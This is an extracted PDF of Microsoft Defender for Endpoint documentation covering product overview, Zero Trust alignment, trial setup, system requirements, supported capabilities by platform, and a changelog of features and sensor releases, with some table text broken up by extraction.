Microsoft 365 Security Defender Endpoint O365 Worldwide

Tell us about your PDF experience.
Microsoft Defender for Endpoint

documentation
Microsoft Defender for Endpoint delivers preventative protection, post-breach
detection, automated investigation, and response.
ｅ OVERVIEW
What is Microsoft Defender for Endpoint?
What is Defender for Endpoint plan 1?
ｈ WHAT'S NEW
What's new in Microsoft Defender for Endpoint
Announcing Microsoft Defender for Endpoint Plan 1
ｑ VIDEO
Overview video
Evaluate & deploy the service
ｂ GET STARTED
Evaluate Microsoft Defender for Endpoint
Plan your deployment
｀ DEPLOY
Deployment guide
Onboard supported devices
Set up and configure Defender for Endpoint Plan 1
ｃ HOW-TO GUIDE
Migration guide
ｑ VIDEO
Onboarding video
Security operations
ｅ OVERVIEW
Endpoint detection and response
Behavioral blocking and containment
Automated investigation and response (AIR)
Advanced hunting
Microsoft Threat Experts
Threat analytics
Use Microsoft Defender for Endpoint on other platforms
ｅ OVERVIEW
Microsoft Defender for Endpoint on Mac
Microsoft Defender for Endpoint on iOS
Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Android
Reference
ｉ REFERENCE
Management and APIs
Partner integration
Security administration
ｅ OVERVIEW
Microsoft Defender Vulnerability Management
Attack surface reduction
Next-generation protection
Article • 01/19/2024
Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender XDR
Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.
Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to

help enterprise networks prevent, detect, investigate, and respond to advanced threats.
７ Note
Example endpoints may include laptops, phones, tablets, PCs, access points,
routers, and firewalls.
 Tip
Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint
Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is
now available for Plan 2.
For more information on the features and capabilities included in each plan,
including the new Defender Vulnerability Management add-on, see Microsoft 365
guidance for security & compliance.
Watch the following video to learn more about Defender for Endpoint:
https://www.microsoft.com/en-us/videoplayer/embed/RE4wDob?postJsllMsg=true
Defender for Endpoint uses the following combination of technology built into Windows
10 and Microsoft's robust cloud service:
Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and
process behavioral signals from the operating system and send this sensor data to
your private, isolated, cloud instance of Microsoft Defender for Endpoint.
Cloud security analytics: Leveraging big-data, device learning, and unique
Microsoft optics across the Windows ecosystem, enterprise cloud products (such
as Office 365), and online assets, behavioral signals are translated into insights,
detections, and recommended responses to advanced threats.
Threat intelligence: Generated by Microsoft hunters, security teams, and

augmented by threat intelligence provided by partners, threat intelligence enables
Defender for Endpoint to identify attacker tools, techniques, and procedures, and
generate alerts when they are observed in collected sensor data.

ﾉ Expand table
Core Defender Attack Next- Endpoint Automated Microsoft

Vulnerability surface generation detection investigation Threat
Management reduction protection and and remediation Experts
response
Centralized configuration and administration, APIs
https://www.microsoft.com/en-us/videoplayer/embed/RE4vnC4?
rel=0&postJsllMsg=true
 Tip
Learn about the latest enhancements in Defender for Endpoint: What's new in
Microsoft Defender for Endpoint.
Microsoft Defender for Endpoint demonstrated industry-leading optics and
detection capabilities in the recent MITRE evaluation. Read: Insights from the
MITRE ATT&CK-based evaluation .
） Important
The capabilities on non-Windows platforms may be different from the ones for
Windows. For more information on what capabilities are available for non-Windows
platforms, see Microsoft Defender for Endpoint for non-Windows platforms.
Core Defender Vulnerability Management
Built-in core vulnerability management capabilities use a modern risk-based approach

to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities
and misconfigurations. To further enhance your ability to assess your security posture
and reduce risk, a new Defender Vulnerability Management add-on for Plan 2 is
available.
For more information on the different vulnerability management capabilities available to

you, see Compare Microsoft Defender Vulnerability Management offerings.
The attack surface reduction set of capabilities provides the first line of defense in the
stack. By ensuring configuration settings are properly set and exploit mitigation
techniques are applied, the capabilities resist attacks and exploitation. This set of
capabilities also includes network protection and web protection, which regulate access
to malicious IP addresses, domains, and URLs.
To further reinforce the security perimeter of your network, Microsoft Defender for
Endpoint uses next-generation protection designed to catch all types of emerging
threats.
Endpoint detection and response capabilities are put in place to detect, investigate, and
respond to advanced threats that may have made it past the first two security pillars.
Advanced hunting provides a query-based threat-hunting tool that lets you proactively
find breaches and create custom detections.
Automated investigation and remediation
In conjunction with being able to quickly respond to advanced attacks, Microsoft

Defender for Endpoint offers automatic investigation and remediation capabilities that
help reduce the volume of alerts in minutes at scale.
Microsoft Secure Score for Devices

Defender for Endpoint includes Microsoft Secure Score for Devices to help you
dynamically assess the security state of your enterprise network, identify unprotected
systems, and take recommended actions to improve the overall security of your
organization.
Microsoft Defender for Endpoint's new managed threat hunting service provides
proactive hunting, prioritization, and additional context and insights that further
empower Security operation centers (SOCs) to identify and respond to threats quickly
and accurately.
） Important
Defender for Endpoint customers need to apply for the Microsoft Threat Experts
managed threat hunting service to get proactive Targeted Attack Notifications and
to collaborate with experts on demand. Experts on Demand is an add-on service.
Targeted Attack Notifications are always included after you have been accepted
into Microsoft Threat Experts managed threat hunting service.
If you are not enrolled yet and would like to experience its benefits, go to Settings
> General > Advanced features > Microsoft Threat Experts to apply. Once
accepted, you will get the benefits of Targeted Attack Notifications, and start a 90-
day trial of Experts on Demand. Contact your Microsoft representative to get a full
Experts on Demand subscription.
Integrate Microsoft Defender for Endpoint into your existing workflows.
Integration with Microsoft solutions
Defender for Endpoint directly integrates with various Microsoft solutions, including:
Microsoft Defender for Cloud

Microsoft Sentinel
Intune
Microsoft Defender for Cloud Apps
Microsoft Defender for Identity
Microsoft Defender for Office
Skype for Business

With Microsoft Defender XDR, Defender for Endpoint, and various Microsoft security
solutions, form a unified pre- and post-breach enterprise defense suite that natively
integrates across endpoint, identity, email, and applications to detect, prevent,
investigate, and automatically respond to sophisticated attacks.
 Tip
Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .
Feedback
Was this page helpful?  Yes  No
Provide product feedback

Zero Trust with Microsoft Defender for
Endpoint
Article • 11/17/2023
７ Note
Want to experience Microsoft Defender XDR? Learn more about how you can
evaluate and pilot Microsoft Defender XDR.
Applies to:
Microsoft Defender XDR for Endpoint

Zero Trust is a security strategy for designing and implementing the following set of
security principles:
ﾉ Expand table
Verify explicitly Use least privilege access Assume breach
Always authenticate Limit user access with Just-In- Minimize blast radius and segment
and authorize based Time and Just-Enough-Access access. Verify end-to-end encryption
on all available data (JIT/JEA), risk-based adaptive and use analytics to get visibility,
points. policies, and data protection. drive threat detection, and improve
defenses.
Defender for Endpoint is a primary component of the Assume breach principle and an
important element of your extended detection and response (XDR) deployment with
Microsoft Defender XDR.
Defender for Endpoint uses the following combination of technologies built into
Windows 10 and 11 and Microsoft's robust cloud service:
Endpoint behavioral sensors: Sensors embedded in Windows 10 and 11 collect

and process behavioral signals from the operating system and send this sensor
data to your private, isolated, cloud instance of Microsoft Defender for Endpoint.
Cloud security analytics: Defender for Endpoint translates behavioral signals into
insights, detections, and recommended responses to advanced threats. Defender
for Endpoint uses big-data, device learning, and unique Microsoft optics across the
Windows ecosystem and enterprise cloud products such as Microsoft 365.
Threat intelligence: With data generated by Microsoft hunters, security teams, and
partners, threat intelligence enables Defender for Endpoint to identify attacker
tools, techniques, and procedures, and generate alerts that are observed in
collected sensor data.
Defender for Endpoint and other Microsoft security solutions form a unified pre- and
post-breach enterprise defense suite for Microsoft Defender XDR. This native integration
across endpoints, identity, email, and applications allows you to detect, prevent,
Threat protection for Zero Trust

Defender for Endpoint provides the following threat protections:
Core Defender Vulnerability Management, which uses a modern risk-based

approach to the discovery, assessment, prioritization, and remediation of endpoint
vulnerabilities and misconfigurations.
Attack surface reduction provides the first line of defense in the stack. By ensuring
configuration settings are properly set and exploit mitigation techniques are
applied, the capabilities resist attacks and exploitation.
Next-generation protection is designed to catch all types of emerging threats.
Endpoint detection and response detect, investigate, and respond to advanced
threats that may have made it past the first two security pillars. Advanced hunting
provides a query-based threat-hunting tool that lets you proactively find breaches
and create custom detections.
Automated investigation and remediation help reduce the volume of alerts in
minutes at scale.
Microsoft Secure Score for Devices helps you dynamically assess the security state
of your enterprise network, identify unprotected systems, and take recommended
actions to improve the overall security of your organization.
Microsoft Threat Experts provides proactive hunting, prioritization, and additional
context and insights that further empower security operation centers (SOCs) to
identify and respond to threats quickly and accurately.
Next steps
Learn more about Zero Trust and how to build an enterprise-scale strategy and
architecture with the Zero Trust Guidance Center.
For endpoint protection concepts and deployment objectives, see Secure endpoints with
Zero Trust.
For the steps to deploy Intune for Microsoft 365 with Zero Trust, see the Manage
devices with Intune and Microsoft 365 solution guidance.
For other Microsoft 365 capabilities that contribute to a strong Zero Trust strategy and
architecture, see Zero Trust deployment plan with Microsoft 365.
For an overview of Zero Trust for Microsoft Defender XDR services, see Zero Trust with
 Tip
Feedback

Trial user guide: Microsoft Defender for
Endpoint
Article • 10/20/2023
Welcome to the Microsoft Defender for Endpoint Plan 2 trial user guide!
This playbook is a simple guide to help you make the most of your free trial. Using the
suggested steps in this article from the Microsoft Defender team, you'll learn how
Defender for Endpoint can help you to prevent, detect, investigate, and respond to
advanced threats.
What is Defender for Endpoint?

Defender for Endpoint is an enterprise endpoint security platform that uses the
following combination of technology built into Windows and Microsoft's robust cloud
service:
Endpoint behavioral sensors: Embedded in Windows, these sensors collect and

process behavioral signals from the operating system and send sensor data to your
private, isolated, cloud instance of Defender for Endpoint.
Cloud security analytics: Using big data, device learning, and unique Microsoft
optics across the Windows ecosystem, enterprise cloud products (such as
Microsoft 365), and online assets, behavioral signals are translated into insights,
detections, and recommended responses to advanced threats.
Threat intelligence: Generated by Microsoft hunters and security teams, and

augmented by threat intelligence provided by partners, threat intelligence enables
Defender for Endpoint to identify attacker tools, techniques, and procedures, and
generate alerts when they're observed in collected sensor data.

ﾉ Expand table
Core Defender Attack Next- Endpoint Automated Microsoft

detection
Vulnerability surface generation and investigation Threat
Management reduction protection response and remediation Experts
Let's get started!
Set up your trial

1. Confirm your license state.
2. Set up role-based access control and grant permissions to your security team.
3. Visit the Microsoft Defender portal.
4. Onboard endpoints using any of the supported management tools.
5. Configure capabilities.
6. Experience Microsoft Defender for Endpoint through simulated attacks.
7. Set up the Microsoft Defender for Endpoint evaluation lab.
Step 1: Confirm your license state

To make sure your Defender for Endpoint subscription is properly provisioned, you can
check your license state in either the Microsoft 365 admin center
(https://admin.microsoft.com ) or Microsoft Entra ID (https://portal.azure.com ).
Check your license state.
Step 2: Set up role-based access control and

grant permissions to your security team
Microsoft recommends using the concept of least privileges. Defender for Endpoint uses
built-in roles within Microsoft Entra ID. Review the different roles that are available and
choose appropriate roles for your security team. Some roles may need to be applied
temporarily and removed after the trial has been completed.
Use Privileged Identity Management to manage your roles to provide extra auditing,
control, and access review for users with directory permissions.
Defender for Endpoint supports two ways to manage permissions:

Basic permissions management: Set permissions to either full access or read-only.
Users with Global Administrator or Security Administrator roles in Microsoft Entra
ID have full access. The Security reader role has read-only access and doesn't grant
access to view machines/device inventory.
Role-based access control (RBAC): Set granular permissions by defining roles,

assigning Microsoft Entra user groups to the roles, and granting the user groups
access to device groups. For more information, see Manage portal access using
role-based access control.
７ Note
Device group creation is supported in Defender for Endpoint Plan 1 and Plan
2.
Step 3: Visit the Microsoft Defender portal

The Microsoft Defender portal (https://security.microsoft.com ) is where you can
access your Defender for Endpoint capabilities.
1. Review what to expect in the Microsoft Defender portal.
2. Go to https://security.microsoft.com and sign in.
3. In the navigation pane, see the Endpoints section to access your capabilities.
Step 4: Onboard endpoints using any of the

supported management tools
This section outlines the general steps you to onboard devices (endpoints).
1. Watch this video for a quick overview of the onboarding process and learn about
the available tools and methods.
2. Review your device onboarding tool options and select the most appropriate
option for your environment.
Step 5: Configure capabilities

After onboarding devices (endpoints), you'll configure the various capabilities, such as
endpoint detection and response, next-generation protection, and attack surface
reduction.
Use this table to choose components to configure. We recommend configuring all

available capabilities, but you're able to skip the ones that don't apply.
Step 6: Experience Microsoft Defender for

Endpoint through simulated attacks
You might want to experience Defender for Endpoint before you onboard more than a
few devices to the service. To do this, you can run controlled attack simulations on a few
test devices. After running the simulated attacks, you can review how Defender for
Endpoint surfaces malicious activity and explore how it enables an efficient response.
To run any of the provided simulations, you need at least one onboarded device.
1. Access the tutorials. In the Microsoft Defender portal

(https://security.microsoft.com ), in the navigation pane, under Endpoints,
choose Tutorials.
2. Read the walkthrough document provided with each attack scenario. Each
document includes OS and application requirements and detailed instructions that
are specific to an attack scenario.
3. Run a simulation.
Step 7: Set up the Microsoft Defender for

Endpoint evaluation lab
The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the
complexities of device and environment configuration so that you can focus on
evaluating the capabilities of the platform, running simulations, and seeing the
prevention, detection, and remediation features in action. Using the simplified set-up
experience in evaluation lab, you can focus on running your own test scenarios and the
pre-made simulations to see how Defender for Endpoint performs.
Watch the video overview of the evaluation lab

Get started with the lab
See also
Defender for Endpoint technical documentation
Microsoft Security technical content library
Defender for Endpoint demonstration
 Tip
Feedback

Minimum requirements for Microsoft
Defender for Endpoint
Article • 11/15/2023
Applies to:

There are some minimum requirements for onboarding devices to the Defender for
Endpoint service. Learn about the licensing, hardware and software requirements, and
other configuration settings to onboard devices to the service.
 Tip
Learn about the latest enhancements in Defender for Endpoint: Defender for
Endpoint Tech Community .
Defender for Endpoint demonstrated industry-leading optics and detection
capabilities in the recent MITRE evaluation. Read: Insights from the MITRE
ATT&CK-based evaluation .
If you're looking for endpoint protection for small and medium-sized
businesses, see Microsoft Defender for Business and Defender for Business
requirements.
Licensing requirements
Defender for Endpoint Plan 1 and Plan 2 (standalone or as part of other Microsoft
365 plans)
Microsoft Defender for Business (for small and medium-sized businesses)
To onboard servers to the standalone versions of Defender for Endpoint, server

licenses are required. You can choose from:
Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the Defender for
Cloud) offering
Microsoft Defender for Endpoint for Servers
Microsoft Defender for Business servers (for small and medium-sized businesses
only)
For more detailed information about licensing requirements for Microsoft Defender for
Endpoint, see Microsoft Defender for Endpoint licensing information.
For detailed licensing information, see the Product Terms site and work with your
account team to learn more about the terms and conditions.
Browser requirements
Access to Defender for Endpoint is done through a browser. The following browsers are
supported:
Microsoft Edge
Google Chrome
７ Note
Although other browsers might work, the mentioned browsers are the ones
supported.
Hardware and software requirements

Devices on your network must be running one of these editions. New features or
capabilities are typically provided only on operating systems that haven't yet reached
the end of their support lifecycle. For more information, see Supported Microsoft
Defender for Endpoint capabilities by platform. Microsoft recommends the installation
of the latest available security patches for any operating system.
Supported Windows versions

Windows 11 Enterprise
Windows 11 IoT Enterprise
Windows 11 Education
Windows 11 Pro
Windows 11 Pro Education

Windows 10 Enterprise LTSC 2016 (or later)
Windows 10 IoT Enterprise (including LTSC)
Windows 10 Education
Windows 10 Pro
Windows 10 Pro Education
Windows server
Windows Server 2012 R2
Windows Server 2016
Windows Server, version 1803 or later
Windows Server 2019 and later
Windows Server 2019 core edition
Windows Server 2022
Azure Virtual Desktop
Windows 365 running one of the above operating systems/versions
The following operating systems require the use of the Log Analytics / Microsoft
Monitoring Agent (MMA) to work with Defender for Endpoint:
Windows 8.1 Enterprise

Windows 8.1 Pro
Windows 7 SP1 Enterprise
Windows 7 SP1 Pro
Windows Server 2008 R2 SP1
To add antimalware protection to these older operating systems, you can use System
Center Endpoint Protection.
Other supported operating systems

macOS
Linux
Windows Subsystem for Linux
Android
iOS
７ Note
You'll need to confirm the Linux distributions and versions of Android, iOS,
and macOS are compatible with Defender for Endpoint.
While Windows 10 IoT Enterprise is a supported OS in Microsoft Defender for
Endpoint and enables OEMs/ODMs to distribute it as part of their product or
solution, customers should follow the OEM/ODM's guidance around host-
based installed software and supportability.
Endpoints running mobile versions of Windows (such as Windows CE and
Windows 10 Mobile) aren't supported.
Virtual Machines running Windows 10 Enterprise 2016 LTSB can encounter
performance issues when used on non-Microsoft virtualization platforms.
For virtual environments, we recommend using Windows 10 Enterprise LTSC
2019 or later.
The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not
include server licenses. To onboard servers to those plans, you'll need an
additional license, such as Microsoft Defender for Servers Plan 1 or Plan 2 (as
part of the Defender for Cloud offering). To learn more. see Defender for
Endpoint onboarding Windows Server.
If your organization is a small or medium-sized business, see Microsoft
Defender for Business requirements.
Hardware requirements
The minimum hardware requirements for Defender for Endpoint on Windows devices
are the same as the requirements for the operating system itself (that is, they aren't in
addition to the requirements for the operating system).
Cores: 2 minimum, 4 preferred

Memory: 1 GB minimum, 4 preferred
Network and data storage and configuration

requirements
When you run the onboarding wizard for the first time, you must choose where your
Microsoft Defender for Endpoint-related information is stored: in the European Union,
the United Kingdom, or the United States datacenter.
７ Note
You cannot change your data storage location after the first-time setup.
Review the Microsoft Defender for Endpoint data storage and privacy for
more information on where and how Microsoft stores your data.
IP stack
IPv4 (Internet Protocol Version 4) stack must be enabled on devices for communication
to the Defender for Endpoint cloud service to work as expected.
Alternatively, if you must use an IPv6-only configuration, consider adding dynamic

IPv6/IPv4 transitional mechanisms, such as DNS64/NAT64 to ensure end-to-end IPv6
connectivity to Microsoft 365 without any other network reconfiguration.
Internet connectivity
Internet connectivity on devices is required either directly or through proxy.
For more information on other proxy configuration settings, see Configure device proxy
and Internet connectivity settings.
Microsoft Defender Antivirus configuration

requirement
The Defender for Endpoint agent depends on Microsoft Defender Antivirus to scan files
and provide information about them.
Configure Security intelligence updates on the Defender for Endpoint devices whether
Microsoft Defender Antivirus is the active antimalware solution or not. For more
information, see Manage Microsoft Defender Antivirus updates and apply baselines.
When Microsoft Defender Antivirus isn't the active antimalware in your organization and
you use the Defender for Endpoint service, Microsoft Defender Antivirus goes into
passive mode.
If your organization has turned off Microsoft Defender Antivirus through Group Policy or
other methods, devices that are onboarded must be excluded from the Group Policy.
If you're onboarding servers and Microsoft Defender Antivirus isn't the active
antimalware on your servers, configure Microsoft Defender Antivirus to run in passive
mode or uninstall it. The configuration is dependent on the server version. For more
information, see Microsoft Defender Antivirus compatibility.
７ Note
Your regular Group Policy doesn't apply to Tamper Protection, and changes to
Microsoft Defender Antivirus settings will be ignored when Tamper Protection is on.
See What happens when tamper protection is turned on?
Microsoft Defender Antivirus Early Launch

Antimalware (ELAM) driver is enabled
If you're running Microsoft Defender Antivirus as the primary antimalware product on
your devices, the Defender for Endpoint agent will successfully onboard.
If you're running a third-party antimalware client and use Mobile Device Management
solutions or Microsoft Configuration Manager (current branch), you need to ensure the
Microsoft Defender Antivirus ELAM driver is enabled. For more information, see Ensure
that Microsoft Defender Antivirus isn't disabled by policy.
Related articles
Set up Microsoft Defender for Endpoint deployment
Onboard devices
 Tip
Feedback

Supported Microsoft Defender for
Endpoint capabilities by platform
Article • 02/12/2024
Applies to:

Want to experience Defender for Endpoint? Sign up for a free trial.
Learn how to Onboard devices and configure Microsoft Defender for Endpoint
capabilities.
The following table gives information about the supported Microsoft Defender for
Endpoint capabilities by platform.
ﾉ Expand table
Operating System Windows 10 Windows Server macOS Linux

& 11 2012 R2 [1],
2016 [1],
2019 & 2022,
1803+
Prevention
Attack Surface Reduction
Device Control
Firewall
Network Protection [2] [2]
Tamper Protection
Web Protection [2] [2]
Detection
Advanced Hunting
Operating System Windows 10 Windows Server macOS Linux
& 11 2012 R2 [1],
2016 [1],
2019 & 2022,
1803+
Custom file indicators
Custom network indicators [2] [2]
EDR Block
Passive Mode
Sense detection sensor
Endpoint & network device discovery
Vulnerability management
Response
Automated Investigation & Response (AIR)
Device response capabilities: collect [3] [3]
investigation package
Device response capabilities: run AV scan
Device isolation
File response capabilities: collect file, deep

analysis, block file, stop, and quarantine
processes
Live Response
[1]
Refers to the modern, unified solution for Windows Server 2012 R2 and 2016. For
more information, see Onboard Windows Servers to the Defender for Endpoint service.
[2]
Feature is currently in preview (Microsoft Defender for Endpoint preview features)
[3] Response capabilities using Live Response [2]
[4]
Collect file only, using Live Response [2]
７ Note
Windows 7, 8.1, Windows Server 2008 R2 include support for the EDR sensor, and
AV using System Center Endpoint Protection (SCEP).
 Tip
Feedback

What's new in Microsoft Defender for
Endpoint
Article • 01/24/2024
Applies to:

The following features are in preview or generally available (GA) in the latest release of
For more information on preview features, see Preview features.
For more information on what's new with Microsoft Defender for Endpoint on Windows,
see: What's new in Microsoft Defender for Endpoint on Windows
For more information on what's new with other Microsoft Defender security products,
see:
What's new in Microsoft Defender XDR

What's new in Microsoft Defender for Office 365
What's new in Microsoft Defender for Identity
What's new in Microsoft Defender for Cloud Apps
For more information on Microsoft Defender for Endpoint on specific operating systems:
What's new in Defender for Endpoint on Windows

What's new in Defender for Endpoint on macOS
What's new in Defender for Endpoint on Linux
What's new in Defender for Endpoint on Android
What's new in Defender for Endpoint on iOS
January 2024
Defender Boxed is available for a limited period of time. Defender Boxed
highlights your organization's security successes, improvements, and response
actions during 2023. Take a moment to celebrate your organization's
improvements in security posture, overall response to detected threats (manual
and automatic), blocked emails, and more.
Defender Boxed opens automatically when you go to the Incidents page in the
Microsoft Defender portal.
If you close Defender Boxed and you want to reopen it, in the Microsoft
Defender portal, go to Incidents, and then select Your Defender Boxed.
Act quickly! Defender Boxed is available only for a short period of time.
November 2023
Microsoft Defender Core service is now available for consumers and is planned to
begin rolling out to enterprise customers in early 2024.
The Microsoft Defender for Endpoint plug-in for Windows Subsystem for Linux
(WSL) is now available in public preview.
Support for mixed-license scenarios is now generally available in Defender for
Endpoint.
October 2023
(GA) The device isolation and run AV scan responses in macOS and Linux are now
generally available. You can now remotely run an AV scan or isolate devices when
responding to attacks.
(Public Preview) Streamlined device connectivity for Defender for Endpoint is
available in public preview for Windows, macOS, and Linux. This experience makes
it easier to configure and manage Defender for Endpoint services by reducing the
number of URLs required for connectivity, providing IP & Azure service tag
support, and simplifying post-deployment network management.
(Public Preview) User Contain can now contain compromised users automatically
stopping Human Operated Ransomware in its track using Automatic Attack
Disruption.
September 2023
(GA) The Protecting Dev Drive using performance mode is now generally available. The
goal of Performance mode is to improve functional performance for developers who use
Windows 11. Performance mode which reduces the performance impact of Microsoft
Defender Antivirus scans for files stored on designated Dev Drive.
August 2023
(GA) The Monthly security summary report is now generally available. The report
helps organizations get a visual summary of key findings and overall preventative
actions taken to enhance the organization's overall security posture completed in
the last month.
July 2023
The eBPF-based sensor for Microsoft Defender for Endpoint on Linux is available
for public preview on all supported Linux devices. For more information, see Use
eBPF-based sensor for Microsoft Defender for Endpoint on Linux.
Manage endpoint security policies in Defender for Endpoint is now in public
preview
You can now configure security settings directly in Microsoft Defender XDR.
A new file page is now available in Defender for Endpoint. The file page now
includes information like file details and file content and capabilities. For more
information, see Investigate files.
June 2023
Microsoft Defender Antivirus scan response action is supported for macOS and
Linux for client version 101.98.84 and above. It is in preview. See Run Microsoft
Defender Antivirus scan on devices.
Isolating devices from the network is supported for macOS for client version
101.98.84 and above. It is in preview. See Isolate devices from the network.
Forcibly releasing devices from isolation is now available for public preview. This
new capability allows you to forcibly release devices from isolation, when isolated
devices become unresponsive. For more information, see Forcibly release device
from isolation.
May 2023
Performance mode for Microsoft Defender Antivirus is now available for public
preview. This new capability provides asynchronous scanning on a Dev Drive, and
doesn't change the security posture of your system drive or other drives. For more
information, see Protecting Dev Drive using performance mode.
March 2023
Support for mixed-licensing scenarios is now in preview! With these capabilities,
you can Manage Microsoft Defender for Endpoint subscription settings across
client devices (preview!).
February 2023
The Microsoft Defender for Identity integration toggle is now removed from the
Microsoft Defender for Endpoint Settings > Advanced features page. Because
Defender for Identity is now integrated with Microsoft Defender XDR, this toggle is
no longer required. You don't need to manually configure integration between
services. See What's new - Microsoft Defender for Identity.
January 2023
Tamper protection can now protect exclusions when deployed with Microsoft
Intune. See Protect Microsoft Defender Antivirus exclusions from tampering
Live Response is now generally available for macOS and Linux. For more
information, see Investigate entities on devices using live response.
Live response API and library API for Linux and macOS is now generally available
You can now run live response API commands on Linux and macOS.
December 2022
Microsoft Defender for Endpoint Device control removable storage access control
updates:
1. Microsoft Intune support for removable storage access control is now

available. See Deploy and manage device control with Intune.
2. The new default enforcement policy of removable storage access control is
designed for all device control features. Printer Protection is now available for
this policy. If you create a Default Deny policy, printers will be blocked in your
organization.
Intune: ./Vendor/MSFT/Defender/Configuration/DefaultEnforcement
See Deploy and manage device control using Intune
Group policy: Computer Configuration > Administrative Templates >
Windows Components > Microsoft Defender Antivirus > Features > Device
Control > Select Device Control Default Enforcement
See Deploy and manage device control with Group Policy
Microsoft Defender for Endpoint Device control New Printer Protection solution to
manage printer is now available. For more information, see Device control policies.
November 2022
Built-in protection is now generally available. Built-in protection helps protect your
organization from ransomware and other threats with default settings that help
ensure your devices are protected.
October 2022
Network protection C2 detection and remediation is now generally available.
Attackers often compromise existing internet-connected servers to become their
command and control servers. Attackers can use the compromised servers to hide
malicious traffic and deploy malicious bots that are used to infect endpoints.
Network protection detection and remediation will help improve the time it takes
security operations (SecOps) teams to pinpoint and respond to malicious network
threats that are looking to compromise endpoints.
September 2022
Attack surface reduction rules report now available in the Microsoft Defender
portal.
The attack surface reduction rules report is now available in the Microsoft
Defender portal. This ASR report provides information about the attack surface
reduction rules that are applied to devices in your organization and helps you
detect threats, block potential threats, and get visibility into ASR and device
configuration.
Built-in protection (preview) is rolling out. Built-in protection is a set of default

settings, such as tamper protection turned on, to help protect devices from
ransomware and other threats.
Device health reporting is now generally available.

The device health report provides information about the health and security of
your endpoints. The report includes trending information showing the sensor
health state, antivirus status, OS platforms, Windows 10 versions, and Microsoft
Defender Antivirus update versions.
Device health reporting is now available for US Government customers using

Defender for Endpoint.
Device health reporting is now available for GCC, GCC High and DoD customers.
Troubleshooting mode is now available for more Windows operating systems,

including Windows Server 2012 R2 and above. See the article for more information
about the required updates.
August 2022
Device health status
The Device health status card shows a summarized health report for the specific
device.
Device health reporting (Preview)

The devices status report provides high-level information about the devices in your
organization. The report includes trending information showing the sensor health
state, antivirus status, OS platforms, and Windows 10 versions.
Tamper protection on macOS is now generally available

This feature will be released with audit mode enabled by default, and you can
decide whether to enforce (block) or turn off the capability. Later this year, we'll
offer a gradual rollout mechanism that will automatically switch endpoints to block
mode; note this will only apply if you have not made a choice to either enable
(block mode) or disable the capability.
Network Protection and Web Protection for macOS and Linux is now in Public
Preview!
Network Protection helps reduce the attack surface of your devices from Internet-
based events. It prevents employees from using any application to access
dangerous domains that may host phishing scams, exploits, and other malicious
content on the Internet. It's the foundation on which our Web Protection for
Microsoft Defender for Endpoint is built. These capabilities include Web threat
protection, Web content filtering, and IP/URL Custom indicators. Web protection
enables you to secure your devices against web threats and helps to regulate
unwanted content.
Improved Microsoft Defender for Endpoint onboarding for Windows Server 2012
R2 and Windows Server 2016
Configuration Manager version 2207 now supports automatic deployment of
modern, unified Microsoft Defender for Endpoint for Windows Server 2012 R2 &
2016. Windows Server 2012 and 2016 devices that are targeted with Microsoft
Defender for Endpoint onboarding policy will use the unified agent versus the
existing Microsoft Monitoring Agent based solution, if configured through Client
Settings.
July 2022
Add domain controller devices - Evaluation lab enhancement
Now generally available - Add a domain controller to run complex scenarios such
as lateral movement and multistage attacks across multiple devices.
Announcing File page enhancements in Microsoft Defender for Endpoint

Have you ever investigated files in Microsoft Defender for Endpoint? We now make
it even easier with our recent announcement of enhancements to the File page and
side panel. Users can now streamline processes by having a more efficient
navigation experience that hosts all this information in one place.
Introducing the new alert suppression experience

We're excited to share the new and advanced alert suppression experience is now
Generally Available. The new experience provides tighter granularity and control,
allowing users to tune Microsoft Defender for Endpoint alerts.
Prevent compromised unmanaged devices from moving laterally in your

organization with "Contain
Starting today, when a device that isn't enrolled in Microsoft Defender for
Endpoint is suspected of being compromised, as a SOC analyst, you'll be able to
"Contain" it. As a result, any device enrolled in Microsoft Defender for Endpoint will
now block any incoming/outgoing communication with the suspected device.
Mobile device support is now available for US Government Customers using

Microsoft Defender for Endpoint for US Government customers is built in the
Azure US Government environment and uses the same underlying technologies as
Defender in Azure Commercial. This offering is available to GCC, GCC High and
DoD customers and further extends our platform availability from Windows,
macOS, and Linux, to Android and iOS devices as well.
June 2022
Defender for Servers Plan 2 now integrates with MDE unified solution
You can now start deploying the modern, unified solution for Windows Server 2012
R2 and 2016 to servers covered by Defender for Servers Plan 2 using a single
button.
Mobile Network Protection in Microsoft Defender for Endpoint on Android & iOS
now in Public Preview
Microsoft offers a mobile network protection feature in Defender for Endpoint that
helps organizations identify, assess, and remediate endpoint weaknesses with the
help of robust threat intelligence. We're delighted to announce that users can now
benefit from this new feature on both Android and iOS platforms with Microsoft
 Tip
Feedback

Endpoint on Windows
Article • 12/06/2023
Applies to:

Want to experience Defender for Endpoint? Sign up for a free trial .
This page covers the Microsoft Defender for Endpoint EDR MsSense.exe versions. You
can also check the file information section in the monthly cumulative rollup updates in
the following articles:
Windows 11 release information

Windows 10 updates
Windows Server 2022 updates
Windows Server 2019 updates
For the latest updates to Microsoft Defender for Endpoint all up, see What's new in
For the latest updates to Microsoft Defender for Endpoint Next-Generation

Protection/Microsoft Defender Antivirus, see Microsoft Defender Antivirus security
intelligence and product updates
All updates contain:
Performance improvements
Serviceability improvements
Integration improvements (Cloud, Microsoft Defender XDR )
Dec-2023 (Release version: 10.8672.25926.1019)

ﾉ Expand table
OS KB Release version
Windows Server 2012 R2, 2016 KB 5005292 10.8672.25926.1019

What's new
Supports Expanded User Contain capabilities
Sept-2023 (Release version:

10.8560.25364.1036)
ﾉ Expand table
What's new
Supports User Contain availability
May-2023 (Release version: 10.8295.22621.1023)

ﾉ Expand table
What's new
Supports new security settings management capabilities
Jan/Feb-2023 (Release version:

10.8295.22621.1019)
ﾉ Expand table
What's new
Improved command and control security, quality fixes

Dec-2022 (Release version: 10.8210.22621.1016)
ﾉ Expand table
What's new
Bug fixes and stability improvements
Aug-2022 (Release version: 10.8210.*)

ﾉ Expand table
Windows 11 21H2 (Cobalt) KB 5016691 10.8210.22000.918

